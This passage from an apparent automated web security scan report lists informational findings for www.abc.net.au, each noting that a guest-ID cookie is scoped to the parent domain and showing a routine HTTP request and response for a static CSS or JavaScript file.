border-bottom: 4px solid #396789;
}

#latest_media .
...[SNIP]...

8.63. http://www.abc.net.au/local/global_css/common_modules/m60_login.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.abc.net.au
Path:   /local/global_css/common_modules/m60_login.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /local/global_css/common_modules/m60_login.css HTTP/1.1
Host: www.abc.net.au
Proxy-Connection: keep-alive
Referer: http://www.abc.net.au/perth/news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 22 Jun 2011 00:57:53 GMT
ETag: "c8b8f3-b6a-754ee640"
Accept-Ranges: bytes
Content-Type: text/css
Content-Length: 2922
Cache-Control: max-age=29877
Expires: Wed, 07 Sep 2011 22:32:10 GMT
Date: Wed, 07 Sep 2011 14:14:13 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ABCGuestID=80.67.74.139.103791315404853234; expires=Wed, 07-Sep-2011 14:44:13 GMT; path=/; domain=abc.net.au

/* @import url("http://www.abc.net.au/pluck/demos/login/screen.css"); */

#abc_pluck-error {
   color: #EF461C;
}    

#abc_pluck-login, #my-login {
   width: 220px;
   margin: 0;
}

#abc_pluck-logi
...[SNIP]...

8.64. http://www.abc.net.au/local/global_css/common_modules/river_of_content_m20.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.abc.net.au
Path:   /local/global_css/common_modules/river_of_content_m20.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /local/global_css/common_modules/river_of_content_m20.css HTTP/1.1
Host: www.abc.net.au
Proxy-Connection: keep-alive
Referer: http://www.abc.net.au/perth/news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Thu, 04 Aug 2011 04:12:02 GMT
ETag: "123fcc1-4721-2ed1a880"
Accept-Ranges: bytes
Content-Type: text/css
Content-Length: 18209
Cache-Control: max-age=68101
Expires: Thu, 08 Sep 2011 09:09:14 GMT
Date: Wed, 07 Sep 2011 14:14:13 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ABCGuestID=80.67.74.139.103791315404853184; expires=Wed, 07-Sep-2011 14:44:13 GMT; path=/; domain=abc.net.au

/* Temp - New defaults - update older styles */

.river_of_content .image {
   width: 100px;
   min-height: 10px;
   padding: 0 10px 0 0;
}

.river_of_content .image img {
   width: 100px;
}

.riv
...[SNIP]...

8.65. http://www.abc.net.au/local/global_css/common_modules/site_search_m3.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.abc.net.au
Path:   /local/global_css/common_modules/site_search_m3.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /local/global_css/common_modules/site_search_m3.css HTTP/1.1
Host: www.abc.net.au
Proxy-Connection: keep-alive
Referer: http://www.abc.net.au/perth/news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Thu, 19 May 2011 05:14:54 GMT
ETag: "13e5586-40f-15ddef80"
Accept-Ranges: bytes
Content-Type: text/css
Vary: Accept-Encoding
Cache-Control: max-age=24849
Expires: Wed, 07 Sep 2011 21:08:22 GMT
Date: Wed, 07 Sep 2011 14:14:13 GMT
Content-Length: 1039
Connection: close
Set-Cookie: ABCGuestID=80.67.74.139.103791315404853181; expires=Wed, 07-Sep-2011 14:44:13 GMT; path=/; domain=abc.net.au

/* Search Function */

.search {
   width:220px;
   background: url(../../global_img/generic/bg_searchFunction.png) no-repeat bottom;
}

.search h3 {
   padding:8px 8px 5px;
   background: url(../../
...[SNIP]...

8.66. http://www.abc.net.au/local/global_css/common_modules/top_stories_m14.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.abc.net.au
Path:   /local/global_css/common_modules/top_stories_m14.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /local/global_css/common_modules/top_stories_m14.css HTTP/1.1
Host: www.abc.net.au
Proxy-Connection: keep-alive
Referer: http://www.abc.net.au/perth/news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Thu, 19 May 2011 03:12:20 GMT
ETag: "17ec439-c2c-5f88cd00"
Accept-Ranges: bytes
Content-Type: text/css
Content-Length: 3116
Cache-Control: max-age=21595
Expires: Wed, 07 Sep 2011 20:14:07 GMT
Date: Wed, 07 Sep 2011 14:14:12 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ABCGuestID=80.67.74.139.103791315404852891; expires=Wed, 07-Sep-2011 14:44:12 GMT; path=/; domain=abc.net.au

/* Top stories module */

.top_stories {
   background: #fff;
   width: 700px;
   padding-bottom: 10px;
   text-align: left;
   overflow: hidden;
}

.top_stories h2 {
   padding: 0 0 10px 0;
   font-siz
...[SNIP]...

8.67. http://www.abc.net.au/local/global_css/news/styles.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.abc.net.au
Path:   /local/global_css/news/styles.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /local/global_css/news/styles.css HTTP/1.1
Host: www.abc.net.au
Proxy-Connection: keep-alive
Referer: http://www.abc.net.au/perth/news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Tue, 03 May 2011 03:47:45 GMT
ETag: "11d9ee7-e7-bbba40"
Accept-Ranges: bytes
Content-Type: text/css
Content-Length: 231
Cache-Control: max-age=21717
Expires: Wed, 07 Sep 2011 20:16:09 GMT
Date: Wed, 07 Sep 2011 14:14:12 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ABCGuestID=80.67.74.139.103791315404852896; expires=Wed, 07-Sep-2011 14:44:12 GMT; path=/; domain=abc.net.au

.river_of_content h2 {
   display: none;
}

.news #col1 p.description {
   margin: 10px;
   color: #666666;
}

.news .about .story {
   left:-30px;
   overflow:hidden;
   padding: 0 0 0 30px;
   positi
...[SNIP]...

8.68. http://www.abc.net.au/local/global_css/palettes/generic.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.abc.net.au
Path:   /local/global_css/palettes/generic.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /local/global_css/palettes/generic.css HTTP/1.1
Host: www.abc.net.au
Proxy-Connection: keep-alive
Referer: http://www.abc.net.au/perth/news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 08 Sep 2010 02:39:31 GMT
ETag: "1259a3d-61a-6c525ec0"
Accept-Ranges: bytes
Content-Type: text/css
Vary: Accept-Encoding
Cache-Control: max-age=24848
Expires: Wed, 07 Sep 2011 21:08:20 GMT
Date: Wed, 07 Sep 2011 14:14:12 GMT
Content-Length: 1562
Connection: close
Set-Cookie: ABCGuestID=80.67.74.139.103791315404852911; expires=Wed, 07-Sep-2011 14:44:12 GMT; path=/; domain=abc.net.au

.gen_color1 {color: #1c3f5e;}
.gen_color2 {color: #2273b1;}
.gen_color3 {color: #dcf0ff;}
.gen_color4 {color: #4b483f;}
.gen_color5 {color: #746d61;}
.gen_color6 {color: #000000;}
.gen_color7 {c
...[SNIP]...

8.69. http://www.abc.net.au/local/global_css/palettes/paletteA.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.abc.net.au
Path:   /local/global_css/palettes/paletteA.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /local/global_css/palettes/paletteA.css HTTP/1.1
Host: www.abc.net.au
Proxy-Connection: keep-alive
Referer: http://www.abc.net.au/perth/news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 04 May 2011 04:56:45 GMT
ETag: "1259a3f-518-15567d40"
Accept-Ranges: bytes
Content-Type: text/css
Vary: Accept-Encoding
Cache-Control: max-age=70010
Expires: Thu, 08 Sep 2011 09:41:02 GMT
Date: Wed, 07 Sep 2011 14:14:12 GMT
Content-Length: 1304
Connection: close
Set-Cookie: ABCGuestID=80.67.74.139.103791315404852861; expires=Wed, 07-Sep-2011 14:44:12 GMT; path=/; domain=abc.net.au

.paletteA .color1 {color: #434983;}
.paletteA .color2 {color: #4851aa;}
.paletteA .color3 {color: #704694;}
.paletteA .color4 {color: #c1aed1;}
.paletteA .color5 {color: #f5effa;}
.paletteA .colo
...[SNIP]...

8.70. http://www.abc.net.au/local/global_css/styles.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.abc.net.au
Path:   /local/global_css/styles.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /local/global_css/styles.css HTTP/1.1
Host: www.abc.net.au
Proxy-Connection: keep-alive
Referer: http://www.abc.net.au/perth/news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Fri, 15 Jul 2011 08:22:41 GMT
ETag: "1956216-3b90-5a631640"
Accept-Ranges: bytes
Content-Type: text/css
Vary: Accept-Encoding
Cache-Control: max-age=24847
Expires: Wed, 07 Sep 2011 21:08:19 GMT
Date: Wed, 07 Sep 2011 14:14:12 GMT
Content-Length: 15248
Connection: close
Set-Cookie: ABCGuestID=80.67.74.139.103791315404852838; expires=Wed, 07-Sep-2011 14:44:12 GMT; path=/; domain=abc.net.au


#BigPictureMode img {
   float: right ;
   margin-bottom:5px;
   width:185px;
   padding: 5px 5px 5px 0;
}

a {
   text-decoration: none;
}

a:hover {
   text-decoration: underline;
}

ul {
   m
...[SNIP]...

8.71. http://www.abc.net.au/local/global_css/template/styles.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.abc.net.au
Path:   /local/global_css/template/styles.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /local/global_css/template/styles.css HTTP/1.1
Host: www.abc.net.au
Proxy-Connection: keep-alive
Referer: http://www.abc.net.au/perth/news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Thu, 31 Mar 2011 03:37:17 GMT
ETag: "33bbf3-379-289d540"
Accept-Ranges: bytes
Content-Type: text/css
Content-Length: 889
Cache-Control: max-age=24847
Expires: Wed, 07 Sep 2011 21:08:19 GMT
Date: Wed, 07 Sep 2011 14:14:12 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ABCGuestID=80.67.74.139.103791315404852869; expires=Wed, 07-Sep-2011 14:44:12 GMT; path=/; domain=abc.net.au

body {font-size:80%;}

#access_keys {padding: 5px 0; position: absolute; left: -5000px; width: 100%; background: #FFFFFF}

#access_keys a {
   margin: 0 10px;
}

/* Module styles */

.module
...[SNIP]...

8.72. http://www.abc.net.au/local/global_css/yaml/central_draft.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.abc.net.au
Path:   /local/global_css/yaml/central_draft.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /local/global_css/yaml/central_draft.css HTTP/1.1
Host: www.abc.net.au
Proxy-Connection: keep-alive
Referer: http://www.abc.net.au/perth/news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 30 Mar 2011 05:24:55 GMT
ETag: "2fe47e-620-659fb7c0"
Accept-Ranges: bytes
Content-Type: text/css
Content-Length: 1568
Cache-Control: max-age=24847
Expires: Wed, 07 Sep 2011 21:08:19 GMT
Date: Wed, 07 Sep 2011 14:14:12 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ABCGuestID=80.67.74.139.103791315404852839; expires=Wed, 07-Sep-2011 14:44:12 GMT; path=/; domain=abc.net.au

@charset "UTF-8";
@import url(/local/global_css/yaml/core/slim_base.css);
html #page_margins div{float:left}
#page{width:1000px}
#banner{width:100%}
body{text-align:center; margin:0; padding:0;
...[SNIP]...

8.73. http://www.abc.net.au/local/global_css/yaml/core/slim_base.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.abc.net.au
Path:   /local/global_css/yaml/core/slim_base.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /local/global_css/yaml/core/slim_base.css HTTP/1.1
Host: www.abc.net.au
Proxy-Connection: keep-alive
Referer: http://www.abc.net.au/perth/news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Tue, 02 Feb 2010 00:14:39 GMT
ETag: "2fe484-7b9-fcd539c0"
Accept-Ranges: bytes
Content-Type: text/css
Vary: Accept-Encoding
Cache-Control: max-age=24852
Expires: Wed, 07 Sep 2011 21:08:25 GMT
Date: Wed, 07 Sep 2011 14:14:13 GMT
Content-Length: 1977
Connection: close
Set-Cookie: ABCGuestID=80.67.74.139.103791315404853497; expires=Wed, 07-Sep-2011 14:44:13 GMT; path=/; domain=abc.net.au

@charset "UTF-8";
/* "Yet Another Multicolumn Layout" v3.0.6 (c) by Dirk Jesse (http://www.yaml.de)
* $Revision: 202 $ $Date: 2008-06-07 14:29:18 +0200 (Sa, 07 Jun 2008) $ */
@media all {
*{margin
...[SNIP]...

8.74. http://www.abc.net.au/local/global_scripts/contribute/functions.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.abc.net.au
Path:   /local/global_scripts/contribute/functions.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /local/global_scripts/contribute/functions.js HTTP/1.1
Host: www.abc.net.au
Proxy-Connection: keep-alive
Referer: http://www.abc.net.au/perth/news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 27 Jul 2011 02:45:56 GMT
ETag: "f28660-740f-c2bc100"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Content-Length: 29711
Cache-Control: max-age=6707
Expires: Wed, 07 Sep 2011 16:06:00 GMT
Date: Wed, 07 Sep 2011 14:14:13 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ABCGuestID=80.67.74.139.103791315404853252; expires=Wed, 07-Sep-2011 14:44:13 GMT; path=/; domain=abc.net.au

var yourLogin;
yourLogin = {};
var yourGallery = [];

function getCookie(c_name)
{
if (document.cookie.length>0)
{
c_start=document.cookie.indexOf(c_name + "=");
if (c_start!=-1)
{
...[SNIP]...

8.75. http://www.abc.net.au/local/global_scripts/general.min.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.abc.net.au
Path:   /local/global_scripts/general.min.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /local/global_scripts/general.min.js HTTP/1.1
Host: www.abc.net.au
Proxy-Connection: keep-alive
Referer: http://www.abc.net.au/perth/news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 16 May 2011 03:01:47 GMT
ETag: "371668-14d-e047dcc0"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Content-Length: 333
Cache-Control: max-age=57421
Expires: Thu, 08 Sep 2011 06:11:14 GMT
Date: Wed, 07 Sep 2011 14:14:13 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ABCGuestID=80.67.74.139.103791315404853288; expires=Wed, 07-Sep-2011 14:44:13 GMT; path=/; domain=abc.net.au

$(document).ready(function(){var clickstatus="open";$(".bc_icon").click(function(){$(".bc_wrap").toggle("slow");$(".bc_icon").toggleClass("active");if(clickstatus==="open"){$(".bc_icon").attr("title",
...[SNIP]...

8.76. http://www.abc.net.au/local/includes/scripts/city_include.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.abc.net.au
Path:   /local/includes/scripts/city_include.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /local/includes/scripts/city_include.js HTTP/1.1
Host: www.abc.net.au
Proxy-Connection: keep-alive
Referer: http://www.abc.net.au/perth/news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 13 Dec 2010 06:04:30 GMT
ETag: "7570aa-1009-7a2a3780"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Content-Length: 4105
Cache-Control: max-age=57416
Expires: Thu, 08 Sep 2011 06:11:09 GMT
Date: Wed, 07 Sep 2011 14:14:13 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ABCGuestID=80.67.74.139.103791315404853254; expires=Wed, 07-Sep-2011 14:44:13 GMT; path=/; domain=abc.net.au

var LinksLimit = 4;
LinksLimit = parseInt(LinksLimit);

// Specify cookie name.
//var CookieName = "ABCRegion";
var CookieName = "ABCGuestID";

var DaysToLive = 0;
DaysToLive = parseInt(DaysTo
...[SNIP]...

8.77. http://www.abc.net.au/local/includes/scripts/jquery/plugins/jquery.tools.min.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.abc.net.au
Path:   /local/includes/scripts/jquery/plugins/jquery.tools.min.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /local/includes/scripts/jquery/plugins/jquery.tools.min.js HTTP/1.1
Host: www.abc.net.au
Proxy-Connection: keep-alive
Referer: http://www.abc.net.au/perth/news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Sun, 21 Nov 2010 04:24:36 GMT
ETag: "197d20c-e56-8462c900"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: max-age=9635
Expires: Wed, 07 Sep 2011 16:54:48 GMT
Date: Wed, 07 Sep 2011 14:14:13 GMT
Content-Length: 3670
Connection: close
Set-Cookie: ABCGuestID=80.67.74.139.103791315404853243; expires=Wed, 07-Sep-2011 14:44:13 GMT; path=/; domain=abc.net.au

/*
* jquery.tools 1.0.2 - The missing UI library
*
* [tools.tabs-1.0.1]
*
* Copyright (c) 2009 Tero Piirainen
* http://flowplayer.org/tools/
*
* Dual licensed under MIT and GPL 2+ li
...[SNIP]...

8.78. http://www.abc.net.au/local/includes/scripts/tabs_latest_media.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.abc.net.au
Path:   /local/includes/scripts/tabs_latest_media.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /local/includes/scripts/tabs_latest_media.js HTTP/1.1
Host: www.abc.net.au
Proxy-Connection: keep-alive
Referer: http://www.abc.net.au/perth/news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Tue, 22 Dec 2009 01:26:05 GMT
ETag: "197d1ff-88-16f6a540"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Content-Length: 136
Cache-Control: max-age=12700
Expires: Wed, 07 Sep 2011 17:45:53 GMT
Date: Wed, 07 Sep 2011 14:14:13 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ABCGuestID=80.67.74.139.103791315404853287; expires=Wed, 07-Sep-2011 14:44:13 GMT; path=/; domain=abc.net.au

$(function() {
   // setup ul.tabs to work as tabs for each div directly under div.panes
   $("ul.tabslm").tabs("div.paneslm > div");
});

8.79. http://www.abc.net.au/res/abc/styles/screen.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.abc.net.au
Path:   /res/abc/styles/screen.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /res/abc/styles/screen.css HTTP/1.1
Host: www.abc.net.au
Proxy-Connection: keep-alive
Referer: http://www.abc.net.au/perth/news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 14 Mar 2011 01:34:07 GMT
ETag: "1231186-1618-4ec201c0"
Accept-Ranges: bytes
Content-Type: text/css
Content-Length: 5656
Cache-Control: max-age=54776
Expires: Thu, 08 Sep 2011 05:27:08 GMT
Date: Wed, 07 Sep 2011 14:14:12 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ABCGuestID=80.67.74.139.103791315404852841; expires=Wed, 07-Sep-2011 14:44:12 GMT; path=/; domain=abc.net.au


/* --- ABC Nav and Footer styles --- */
/* created by: Geoff Pack, Mar 2009 */
/* last modified: March 2011 */


/* --- ABC Nav --- */

#abcNav {margin:0; padding:0; min-width:10
...[SNIP]...

8.80. http://www.abc.net.au/res/libraries/abcjs/abc.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.abc.net.au
Path:   /res/libraries/abcjs/abc.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /res/libraries/abcjs/abc.js HTTP/1.1
Host: www.abc.net.au
Proxy-Connection: keep-alive
Referer: http://www.abc.net.au/perth/news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 18 Aug 2010 00:51:49 GMT
ETag: "feb3f2-1533-787d3340"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: max-age=67469
Expires: Thu, 08 Sep 2011 08:58:41 GMT
Date: Wed, 07 Sep 2011 14:14:12 GMT
Content-Length: 5427
Connection: close
Set-Cookie: ABCGuestID=80.67.74.139.103791315404852837; expires=Wed, 07-Sep-2011 14:44:12 GMT; path=/; domain=abc.net.au

/**
* @namespace
* @description All general ABC methods and functionality should be placed
*                within this namespace.
* @version    0.0.1 March 2010
* @author        ABC Innovation
*
*/

var
...[SNIP]...

8.81. http://www.abc.net.au/res/libraries/jquery/jquery-latest.min.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.abc.net.au
Path:   /res/libraries/jquery/jquery-latest.min.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /res/libraries/jquery/jquery-latest.min.js HTTP/1.1
Host: www.abc.net.au
Proxy-Connection: keep-alive
Referer: http://www.abc.net.au/perth/news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Tue, 31 May 2011 03:29:29 GMT
ETag: "1a5c576-164ce-2f69840"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Content-Length: 91342
Cache-Control: max-age=35387
Expires: Thu, 08 Sep 2011 00:04:00 GMT
Date: Wed, 07 Sep 2011 14:14:13 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ABCGuestID=80.67.74.139.103791315404853242; expires=Wed, 07-Sep-2011 14:44:13 GMT; path=/; domain=abc.net.au

